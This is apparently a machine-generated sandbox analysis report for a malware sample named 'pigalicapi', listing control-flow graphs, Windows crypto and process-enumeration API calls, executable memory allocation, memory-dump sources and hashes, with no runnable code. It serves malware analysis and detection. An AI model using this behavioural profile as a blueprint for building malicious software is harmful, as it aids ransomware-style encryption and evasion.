                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 726 5d4880-5d489d 728 5d4a9f-5d4ab1 CryptReleaseContext 726->728 729 5d48a3-5d48b9 call 5d7b70 726->729 732 5d48be-5d48f3 CryptCreateHash 729->732 733 5d48f9-5d4913 CryptHashData 732->733 734 5d4a90-5d4a96 732->734 737 5d4919-5d4944 CryptDeriveKey 733->737 738 5d4a83-5d4a8a CryptDestroyHash 733->738 735 5d4a98 734->735 736 5d4a9a 734->736 735->728 736->728 737->738 739 5d494a-5d498f CryptDecrypt CryptDestroyKey 737->739 738->734 739->738 740 5d4995-5d49b1 CryptCreateHash 739->740 740->738 741 5d49b7-5d49d4 CryptHashData 740->741 742 5d49da-5d4a0f CryptGetHashParam 741->742 743 5d4a76-5d4a7d CryptDestroyHash 741->743 742->743 744 5d4a11-5d4a3c CryptGetHashParam 742->744 743->738 744->743 745 5d4a3e-5d4a58 call 5d7c70 744->745 745->743 748 5d4a5a-5d4a72 call 5d7b70 745->748 748->743
                                                                                                                                                                                APIs
                                                                                                                                                                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 005D48EB
                                                                                                                                                                                • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 005D490B
                                                                                                                                                                                • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 005D493C
                                                                                                                                                                                • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 005D496F
                                                                                                                                                                                • CryptDestroyKey.ADVAPI32(00000000), ref: 005D4982
                                                                                                                                                                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 005D49A9
                                                                                                                                                                                • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 005D49CC
                                                                                                                                                                                • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 005D4A07
                                                                                                                                                                                • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 005D4A34
                                                                                                                                                                                • CryptDestroyHash.ADVAPI32(?), ref: 005D4A7D
                                                                                                                                                                                • CryptDestroyHash.ADVAPI32(00000000), ref: 005D4A8A
                                                                                                                                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 005D4AA5
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Crypt$Hash$Destroy$CreateDataParam$ContextDecryptDeriveRelease
                                                                                                                                                                                • String ID: eF]
                                                                                                                                                                                • API String ID: 2727466597-44307731
                                                                                                                                                                                • Opcode ID: fbb239f23d25e6fb975ca0898351999bac43cbe2ea882aeb5b46ea00a94f366b
                                                                                                                                                                                • Instruction ID: 12882b9213a1acc262a523e86d0f8124d47a691ec592d155ccce5a95eada82f4
                                                                                                                                                                                • Opcode Fuzzy Hash: fbb239f23d25e6fb975ca0898351999bac43cbe2ea882aeb5b46ea00a94f366b
                                                                                                                                                                                • Instruction Fuzzy Hash: F6511D71A50319ABDB35CB54CC49FEE7B7DAB48B00F4041DAF609A6280DB759B88CF54
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 769 5d8800-5d8811 770 5d895c-5d8962 769->770 771 5d8817-5d881b 769->771 771->770 772 5d8821-5d8843 CryptAcquireContextA 771->772 773 5d887a-5d887e 772->773 774 5d8845-5d8855 GetLastError 772->774 773->770 777 5d8884-5d88b7 CryptGenKey 773->777 775 5d8857-5d885e 774->775 776 5d8860-5d8874 CryptAcquireContextA 774->776 775->773 775->776 776->773 778 5d88bd-5d88d7 CryptExportKey 777->778 779 5d8950-5d8956 CryptReleaseContext 777->779 780 5d88d9-5d88dd 778->780 781 5d8946-5d894a CryptDestroyKey 778->781 779->770 782 5d893f 780->782 783 5d88df-5d88e3 780->783 781->779 782->781 783->782 784 5d88e5-5d88e9 783->784 784->782 785 5d88eb-5d88ef 784->785 785->782 786 5d88f1-5d8914 CryptImportKey 785->786 787 5d893d 786->787 788 5d8916-5d8937 CryptExportKey CryptDestroyKey 786->788 787->781 788->787
                                                                                                                                                                                APIs
                                                                                                                                                                                • CryptAcquireContextA.ADVAPI32(00000000,005DC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,005D8420,00000000,00001000,00000000), ref: 005D883B
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 005D8845
                                                                                                                                                                                • CryptAcquireContextA.ADVAPI32(00000000,005DC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 005D8874
                                                                                                                                                                                • CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 005D88AF
                                                                                                                                                                                • CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 005D88CF
                                                                                                                                                                                • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 005D890C
                                                                                                                                                                                • CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 005D892A
                                                                                                                                                                                • CryptDestroyKey.ADVAPI32(?), ref: 005D8937
                                                                                                                                                                                • CryptDestroyKey.ADVAPI32(00000000), ref: 005D894A
                                                                                                                                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 005D8956
                                                                                                                                                                                Strings
                                                                                                                                                                                • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 005D882C
                                                                                                                                                                                • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 005D8864
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Crypt$Context$AcquireDestroyExport$ErrorImportLastRelease
                                                                                                                                                                                • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                • API String ID: 3052018297-947817771
                                                                                                                                                                                • Opcode ID: 6c98a960cbd38f778bfaf9a4e6416b54696fad237425e1a337b32317913c5902
                                                                                                                                                                                • Instruction ID: 8fc6bfd8aba17749506ff88bbdc28c26ba3184d5609361482517ca8b7501f9f9
                                                                                                                                                                                • Opcode Fuzzy Hash: 6c98a960cbd38f778bfaf9a4e6416b54696fad237425e1a337b32317913c5902
                                                                                                                                                                                • Instruction Fuzzy Hash: 11412D71A0020AEBDB24CF98CC59BFF7BB8BB44704F10854BF551A6280CBB59948DF91
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 789 5d1ca0-5d1cc3 CreateToolhelp32Snapshot 790 5d1cc9-5d1ce8 Process32First 789->790 791 5d1e51-5d1e57 789->791 792 5d1cee-5d1cfa GetCurrentProcessId 790->792 793 5d1e44-5d1e4b CloseHandle 790->793 794 5d1d04-5d1d10 792->794 793->791 795 5d1d20-5d1d35 Process32Next 794->795 796 5d1d12-5d1d1e 794->796 795->794 797 5d1d37-5d1d3e 795->797 796->797 797->793 798 5d1d44-5d1d59 Process32First 797->798 798->793 799 5d1d5f-5d1d6b 798->799 800 5d1e29-5d1e3e Process32Next 799->800 801 5d1d71-5d1d81 lstrlenA 799->801 800->793 800->799 802 5d1e27 801->802 803 5d1d87-5d1db9 lstrcpyA OpenProcess 801->803 802->793 803->802 804 5d1dbb-5d1de3 EnumProcessModules 803->804 805 5d1de5-5d1e00 GetModuleFileNameExA 804->805 806 5d1e02-5d1e11 GetProcessImageFileNameA 804->806 807 5d1e16-5d1e21 FindCloseChangeNotification 805->807 806->807 807->802
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005D1CB1
                                                                                                                                                                                • Process32First.KERNEL32(000000FF,00000128), ref: 005D1CE1
                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 005D1CEE
                                                                                                                                                                                • Process32Next.KERNEL32 ref: 005D1D2E
                                                                                                                                                                                • Process32First.KERNEL32(000000FF,00000128), ref: 005D1D52
                                                                                                                                                                                • lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 005D1D78
                                                                                                                                                                                • lstrcpyA.KERNEL32(-00000204,?), ref: 005D1D92
                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 005D1DA6
                                                                                                                                                                                • EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 005D1DDC
                                                                                                                                                                                • GetModuleFileNameExA.PSAPI(00000000,?,-00000204,005D575B,00000000,?,00000004,00000000), ref: 005D1DFB
                                                                                                                                                                                • GetProcessImageFileNameA.PSAPI(00000000,-00000204,005D575B,00000000,?,00000004,00000000), ref: 005D1E11
                                                                                                                                                                                • FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,005D575B,00000000,?,00000004,00000000), ref: 005D1E21
                                                                                                                                                                                • Process32Next.KERNEL32 ref: 005D1E37
                                                                                                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 005D1E4B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ProcessProcess32$CloseFileFirstNameNext$ChangeCreateCurrentEnumFindHandleImageModuleModulesNotificationOpenSnapshotToolhelp32lstrcpylstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 384183238-0
                                                                                                                                                                                • Opcode ID: 76c11d362257393934af46a51955ca38c4abcf0213fd4dc3e2b708a420d5d761
                                                                                                                                                                                • Instruction ID: c676060a61e25c712c72ed3b5dd21ea1c26ea454196c00cd155d8e2cd3cdcf67
                                                                                                                                                                                • Opcode Fuzzy Hash: 76c11d362257393934af46a51955ca38c4abcf0213fd4dc3e2b708a420d5d761
                                                                                                                                                                                • Instruction Fuzzy Hash: 4541FE75901619EBDB35EB68CD89BEDBBB9BB58300F0045CAE50C97251D730AE84CF54
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • CryptAcquireContextA.ADVAPI32(00000000,005DC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 005D8BFF
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 005D8C09
                                                                                                                                                                                • CryptAcquireContextA.ADVAPI32(00000000,005DC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 005D8C38
                                                                                                                                                                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 005D8C59
                                                                                                                                                                                • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 005D8C71
                                                                                                                                                                                • CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 005D8C99
                                                                                                                                                                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 005D8CC1
                                                                                                                                                                                • CryptDestroyHash.ADVAPI32(00000000), ref: 005D8CD5
                                                                                                                                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 005D8CE1
                                                                                                                                                                                Strings
                                                                                                                                                                                • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 005D8C28
                                                                                                                                                                                • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 005D8BF0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastRelease
                                                                                                                                                                                • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                • API String ID: 731959895-947817771
                                                                                                                                                                                • Opcode ID: 185494f754768a170df32dfc8ece247292ea51be9b278ac673bae32e685a4a64
                                                                                                                                                                                • Instruction ID: bb27d25958139c3e08b56effb1f92e8e70a594d321a239b5725934b9245687f5
                                                                                                                                                                                • Opcode Fuzzy Hash: 185494f754768a170df32dfc8ece247292ea51be9b278ac673bae32e685a4a64
                                                                                                                                                                                • Instruction Fuzzy Hash: 32410D71A5120AEBDB24DF98CC49FFF7BB8BB04701F14855BF601AA290DBB49944DB60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • CryptAcquireContextA.ADVAPI32(00000000,005DC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 005D8AD3
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 005D8ADD
                                                                                                                                                                                • CryptAcquireContextA.ADVAPI32(00000000,005DC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 005D8B0C
                                                                                                                                                                                • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 005D8B37
                                                                                                                                                                                • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 005D8B5E
                                                                                                                                                                                • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 005D8B7A
                                                                                                                                                                                • CryptDestroyKey.ADVAPI32(00000000), ref: 005D8B87
                                                                                                                                                                                • CryptDestroyKey.ADVAPI32(00000000), ref: 005D8B91
                                                                                                                                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 005D8B9D
                                                                                                                                                                                Strings
                                                                                                                                                                                • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 005D8AFC
                                                                                                                                                                                • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 005D8AC4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Crypt$Context$AcquireDestroyImport$DecryptErrorLastRelease
                                                                                                                                                                                • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                • API String ID: 1555285084-947817771
                                                                                                                                                                                • Opcode ID: 5849c6859df03da8852c6751ad3645968d899c7d2cb4c63829bad15774bb89f5
                                                                                                                                                                                • Instruction ID: e3495a696589c8125a0f1fab56747d72948c60401eaff0044aed9d2108b2ad7f
                                                                                                                                                                                • Opcode Fuzzy Hash: 5849c6859df03da8852c6751ad3645968d899c7d2cb4c63829bad15774bb89f5
                                                                                                                                                                                • Instruction Fuzzy Hash: 8731FFB1A40209EBEF24CF98CC49FEE7BB8FB58705F14855BF501A6290CBB49944DB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • CryptAcquireContextA.ADVAPI32(00000000,005DC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 005D89BF
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 005D89C9
                                                                                                                                                                                • CryptAcquireContextA.ADVAPI32(00000000,005DC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 005D89F8
                                                                                                                                                                                • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 005D8A1F
                                                                                                                                                                                • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 005D8A41
                                                                                                                                                                                • CryptDestroyKey.ADVAPI32(00000000), ref: 005D8A4E
                                                                                                                                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 005D8A5A
                                                                                                                                                                                Strings
                                                                                                                                                                                • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 005D89E8
                                                                                                                                                                                • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 005D89B0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Crypt$Context$Acquire$DestroyEncryptErrorImportLastRelease
                                                                                                                                                                                • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                • API String ID: 3736710109-947817771
                                                                                                                                                                                • Opcode ID: 79eb274b9807b9c21e2e643f3d332998800d2b3385b617e8927cb73bbf022a02
                                                                                                                                                                                • Instruction ID: d41ca93efb93f6500fdd6fd3705a7d87d8e7dba02317132e856c065f7f1fdd10
                                                                                                                                                                                • Opcode Fuzzy Hash: 79eb274b9807b9c21e2e643f3d332998800d2b3385b617e8927cb73bbf022a02
                                                                                                                                                                                • Instruction Fuzzy Hash: CE310F75A40209EFDB24CFA8CC49FEE7BB5FB48701F14854BF505AA290CBB49A84DB50
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00596221
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,0063F02F,00003000,00000040), ref: 00596289
                                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00596350
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675754301.0000000000596000.00000040.00001000.00020000.00000000.sdmp, Offset: 00596000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_596000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocVirtual$LibraryLoad
                                                                                                                                                                                • String ID: .$GetProcAddress.$l$lloc
                                                                                                                                                                                • API String ID: 2441068224-1161241244
                                                                                                                                                                                • Opcode ID: ae2d4a658cb016d9caf0d991730e99a6e299ba687abf2cc8df3dcc277493a898
                                                                                                                                                                                • Instruction ID: de9a3cc69d407c135332009efe28414be9f1888314890449483732a0bfb4f668
                                                                                                                                                                                • Opcode Fuzzy Hash: ae2d4a658cb016d9caf0d991730e99a6e299ba687abf2cc8df3dcc277493a898
                                                                                                                                                                                • Instruction Fuzzy Hash: 8C2246B1A00219DFDF14CFA9C884AAEBBB5FF48314F258569E909AB345D770E944CF90
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 012144CB: VirtualAlloc.KERNEL32(00000000,00020000,00003000,00000040), ref: 012145D4
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 01203B07
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocExitProcessVirtual
                                                                                                                                                                                • String ID: T#$Z$$f!
                                                                                                                                                                                • API String ID: 3766876677-3412040500
                                                                                                                                                                                • Opcode ID: f9de4dd6c3523a5db687e879825a9645f88b22e9e918051bc32e4715c3550548
                                                                                                                                                                                • Instruction ID: a9157105dc6d40e256afbbb9fd51382f41d3b183252e2abcffc9f036517d6f13
                                                                                                                                                                                • Opcode Fuzzy Hash: f9de4dd6c3523a5db687e879825a9645f88b22e9e918051bc32e4715c3550548
                                                                                                                                                                                • Instruction Fuzzy Hash: 0E715A71519340AFE310CF68C988A2BBBE9FBC8714F41492CF584AB245D738ED458B66
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005D97CF
                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000), ref: 005D97D6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3859560861-0
                                                                                                                                                                                • Opcode ID: e9b4e5fdd3ac917492aa979aa1cecadb32578651381a165267d7d5dcb8049ecc
                                                                                                                                                                                • Instruction ID: ebe0b2c5f27f088841976afac1c5a5bbb2072a6d5121c3ae5a2b5cc30cf672a9
                                                                                                                                                                                • Opcode Fuzzy Hash: e9b4e5fdd3ac917492aa979aa1cecadb32578651381a165267d7d5dcb8049ecc
                                                                                                                                                                                • Instruction Fuzzy Hash: 4DC01271001208EBDB109F94D80CBA93F5DE704306F044003B60C85560C6709484C751
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00020000,00003000,00000040), ref: 012145D4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                • Opcode ID: 8830d1a1c5780dd2cc07cf189d62843f17fb631c165100c9307bde29b22fce79
                                                                                                                                                                                • Instruction ID: de448b86119646b876fbb8fc9f3a5ba018184b9e021466a605bb31f3265dd1ab
                                                                                                                                                                                • Opcode Fuzzy Hash: 8830d1a1c5780dd2cc07cf189d62843f17fb631c165100c9307bde29b22fce79
                                                                                                                                                                                • Instruction Fuzzy Hash: 59A1AC756143419FE714CF28E988A66B7F5FB98300F048A2DFA5A8B349D770E841CF65
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 005D97A0: GetProcessHeap.KERNEL32(00000008,005D9FB2,?,005D9FB2,00000000,?,?,?,005D9E2D), ref: 005D97A9
                                                                                                                                                                                  • Part of subcall function 005D97A0: RtlAllocateHeap.NTDLL(00000000,?,005D9FB2,00000000,?,?,?,005D9E2D), ref: 005D97B0
                                                                                                                                                                                • GetAdaptersInfo.IPHLPAPI(00000000,005D9E2D), ref: 005D9FEB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$AdaptersAllocateInfoProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1318000056-0
                                                                                                                                                                                • Opcode ID: 374b3df48fd222b748f5d8f60070611a91b87633199b25d56e39dc9f3738b929
                                                                                                                                                                                • Instruction ID: 2df35cef279268a961288a2e1b4ad44a826e79cf3141e032382731a4729d9dba
                                                                                                                                                                                • Opcode Fuzzy Hash: 374b3df48fd222b748f5d8f60070611a91b87633199b25d56e39dc9f3738b929
                                                                                                                                                                                • Instruction Fuzzy Hash: B8310C74E00209EFDB14CF98C499AEEBBB5FF88304F14856AE909A7350D7359A45CB91
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0000D768,0120D296), ref: 0120D761
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                • Opcode ID: f690c7511571def9ee5964fca5740031c2e12e124a20cbaf6859b302babf44b1
                                                                                                                                                                                • Instruction ID: 41cc955a735e028a135ab4a21302658f271d70855fd0d76afc101958554e7ab0
                                                                                                                                                                                • Opcode Fuzzy Hash: f690c7511571def9ee5964fca5740031c2e12e124a20cbaf6859b302babf44b1
                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
